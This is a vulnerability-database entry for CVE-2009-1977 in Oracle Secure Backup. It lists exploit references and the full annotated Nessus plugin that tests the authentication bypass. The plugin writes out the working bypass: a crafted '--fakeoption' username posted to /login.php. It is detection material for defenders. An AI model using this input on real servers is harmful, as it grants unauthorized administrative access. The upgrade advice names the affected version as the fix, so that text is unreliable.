Vulnerabilities > CVE-2009-1977 - Remote Authentication Bypass vulnerability in Oracle Secure Backup 10.2.0.3

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
oracle
critical
nessus
exploit available
metasploit

Summary

Unspecified vulnerability in the Oracle Secure Backup component in Oracle Secure Backup 10.2.0.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the July 2009 Oracle CPU. Oracle has not commented on claims from an independent researcher that this vulnerability allows attackers to bypass authentication via unknown vectors involving the username parameter and login.php.

Vulnerable Configurations

Part Description Count
Application
Oracle
1

D2sec

name: Oracle Secure Backup 10.3.0.1 RCE
url: http://www.d2sec.com/exploits/oracle_secure_backup_10.3.0.1_rce.html

Exploit-Db

description: Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit. CVE-2009-1977. Remote exploit for Windows platform
id: EDB-ID:9652
last seen: 2016-02-01
modified: 2009-09-14
published: 2009-09-14
reporter: ikki
source: https://www.exploit-db.com/download/9652/
title: Oracle Secure Backup Server 10.3.0.1.0 - Auth Bypass/RCI Exploit

Metasploit

description: This module exploits an authentication bypass vulnerability in login.php in order to execute arbitrary code via a command injection vulnerability in property_box.php. This module was tested against Oracle Secure Backup version 10.3.0.1.0 (Win32).
id: MSF:AUXILIARY/ADMIN/ORACLE/OSB_EXECQR2
last seen: 2019-12-13
modified: 2017-07-24
published: 2009-09-16
references:
reporter: Rapid7
source: https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/oracle/osb_execqr2.rb
title: Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability

Nessus

NASL family: CGI abuses
NASL id: OSB_FAKEOPTION_AUTH_BYPASS.NASL
description: The remote web server is the Administration Server for Oracle Secure Backup, a centralized tape backup management software application. The installed version of Oracle Secure Backup allows a remote attacker to bypass authentication using a specially crafted username, such as '--fakeoption'.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 40989
published: 2009-09-14
reporter: This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/40989
title: Oracle Secure Backup Administration Server Authentication Bypass
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


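if (description)
{
  # Plugin registration. This branch only records identifiers,
  # cross-references, report text and scheduling requirements, then leaves
  # through the exit(0) at the bottom before any of the check code runs.
  script_id(40989);
  script_version("1.21");
  script_cvs_date("Date: 2018/11/15 20:50:18");

  script_cve_id("CVE-2009-1977");
  script_bugtraq_id(35672);
  script_xref(name:"EDB-ID", value:"9652");

  script_name(english:"Oracle Secure Backup Administration Server Authentication Bypass");
  # The check below submits a crafted login and inspects the redirect; it
  # does not try to provoke a SQL error, so the summary says what it does.
  script_summary(english:"Tries to bypass authentication");

  script_set_attribute( attribute:"synopsis", value:
"The remote web server contains a PHP application that allows an
attacker to bypass authentication."  );
  script_set_attribute( attribute:"description",  value:
"The remote web server is the Administration Server for Oracle Secure
Backup, a centralized tape backup management software application.

The installed version of Oracle Secure Backup allows a remote attacker
to bypass authentication using a specially crafted username, such as
'--fakeoption'.

An unauthenticated, remote attacker can leverage this issue to bypass
authentication and gain administrative access to the application.
Under Windows, this can lead to a complete system compromise.

Note that this install is also likely to be affected by multiple
command injection vulnerabilities, although Nessus has not checked for
them."  );
  script_set_attribute( attribute:"see_also",  value:
"https://www.zerodayinitiative.com/advisories/ZDI-09-058/"  );
  script_set_attribute( attribute:"see_also",  value:
"https://seclists.org/fulldisclosure/2009/Aug/249"  );
  script_set_attribute( attribute:"see_also",  value:
"https://www.oracle.com/technetwork/topics/security/cpujul2009-091332.html"  );
  # NOTE(review): the NVD summary for CVE-2009-1977 names 10.2.0.3 as the
  # affected release, which does not sit well with "10.2.0.3 or later" as
  # the remedy. Confirm the fixed version against the Oracle July 2009 CPU
  # advisory before using this text as remediation guidance.
  script_set_attribute( attribute:"solution",  value:
"Upgrade to Oracle Secure Backup version 10.2.0.3 or later."  );

  # CVSS v2 base vector: network-reachable, low complexity, no
  # authentication, complete C/I/A impact.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  # NOTE(review): "false" here sits next to E:F in the temporal vector and
  # two exploit_framework_* attributes set to "true"; confirm which value
  # is intended so that exploit-availability filters do not miss this finding.
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Oracle Secure Backup 10.3.0.1 RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:oracle:secure_backup");
  script_set_attribute(
    attribute:"vuln_publication_date",
    value:"2009/08/18"
  );
  script_set_attribute(
    attribute:"patch_publication_date",
    value:"2009/07/14"
  );
  script_set_attribute(
    attribute:"plugin_publication_date",
    value:"2009/09/14"
  );
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  # ACT_ATTACK: the check submits a login attempt to the target instead of
  # only fingerprinting it, so a positive result means a session was opened.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.");

  # Scheduling: needs a discovered web service (or port 443) that has been
  # flagged as PHP-capable; not run when the disable_cgi_scanning key is set.
  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 443);
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");

  exit(0);
}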


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


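# Authentication-bypass check for the Oracle Secure Backup web interface.
# Flow: locate the HTTPS service, confirm /login.php looks like the OSB
# login form, submit one crafted login, and report if the response shows
# an authenticated session being opened.
port = get_http_port(default:443);
if (!can_host_php(port:port)) exit(0, "Web server does not support PHP scripts.");


# nb: the username can be anything starting with '--',
#     and the password can be anything.
user = "--fakeoption";
pass = "NESSUS";


# Make sure the affected script exists and is the OSB login form before
# any login attempt is sent.
url = "/login.php";

res = http_send_recv3(port:port, method:"GET", item:url);
if (isnull(res)) exit(1, "The web server failed to respond.");

if (
  "<title>Oracle Secure Backup Web Interface</title>" >< res[2] &&
  '<input name="uname" ' >< res[2]
)
{
  # Same fields the login form posts, with the crafted username.
  postdata = string(
    "button=Login&",
    "attempt=1&",
    "mode=&",
    "tab=&",
    "uname=", user, "&",
    "passwd=", pass
  );

  req = http_mk_post_req(
    port        : port,
    item        : url,
    data        : postdata,
    content_type: "application/x-www-form-urlencoded"
  );
  res = http_send_recv_req(port:port, req:req, exit_on_fail: 1);

  # Pull out the status code and the two headers the verdict depends on,
  # defaulting each one so a missing header cannot match below.
  hdrs = parse_http_headers(status_line:res[0], headers:res[1]);
  if (isnull(hdrs['$code'])) code = 0;
  else code = hdrs['$code'];

  if (isnull(hdrs['set-cookie'])) cookies = "";
  else cookies = hdrs['set-cookie'];

  if (isnull(hdrs['location'])) location = "";
  else location = hdrs['location'];

  # There's a problem if ...
  if (
    # we're redirected and ...
    code == 302 &&
    "/index.php?tab=&mode=" >< location &&
    # a session cookie was set.
    "PHPSESSID=" >< cookies
  )
  {
    # NOTE(review): a positive result means the server issued a session
    # cookie for the crafted login. The script exits without logging out,
    # so that session is left to expire on the target by itself.
    if (report_verbosity > 0)
    {
      report = string(
        "\n",
        "Nessus was able to gain access using the following credentials :\n",
        "\n",
        "  URL      : ", build_url(port:port, qs:url), "\n",
        "  User     : ", user, "\n",
        "  Password : ", pass, "\n"
      );
      security_hole(port:port, extra:report);
    }
    else security_hole(port);
    exit(0);
  }

  # The login form was found but the crafted login was not accepted;
  # record that explicitly instead of ending silently.
  exit(0, string("The Oracle Secure Backup install on port ", port, " does not appear to be affected."));
}

# /login.php answered but is not the Oracle Secure Backup login form.
exit(0, string("The web server on port ", port, " does not appear to host the Oracle Secure Backup web interface."));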

Packetstorm

data source: https://packetstormsecurity.com/files/download/81262/osbs-bypass.txt
id: PACKETSTORM:81262
last seen: 2016-12-05
published: 2009-09-15
reporter: Luca Carettoni
source: https://packetstormsecurity.com/files/81262/Oracle-Secure-Backup-Server-Bypass-Command-Injection.html
title: Oracle Secure Backup Server Bypass / Command Injection

Seebug

bulletinFamily: exploit
description: No description provided by source.
id: SSV:12329
last seen: 2017-11-19
modified: 2009-09-16
published: 2009-09-16
reporter: Root
source: https://www.seebug.org/vuldb/ssvid-12329
title: Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit